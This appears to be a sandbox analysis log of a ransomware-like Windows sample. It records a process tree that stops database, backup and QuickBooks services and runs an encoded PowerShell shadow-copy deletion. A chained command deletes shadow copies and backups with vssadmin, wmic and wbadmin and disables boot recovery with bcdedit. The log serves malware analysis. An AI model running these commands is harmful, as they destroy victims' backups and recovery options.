- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SQLEXPRESS
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
      4⤵
      PID:1648
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser
    3⤵
    PID:1560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:1608
- - C:\Windows\SysWOW64\net.exe
    net stop CobianBackup11
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop CobianBackup11
      4⤵
      PID:1044
- - C:\Windows\SysWOW64\net.exe
    net stop cbVSCService11
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop cbVSCService11
      4⤵
      PID:1772
- - C:\Windows\SysWOW64\net.exe
    net stop QBCFMontorService
    3⤵
    PID:1596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMontorService
      4⤵
      PID:1940
- - C:\Windows\SysWOW64\net.exe
    net stop QBVSS
    3⤵
    PID:792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBVSS
      4⤵
      PID:1544
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1552
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1168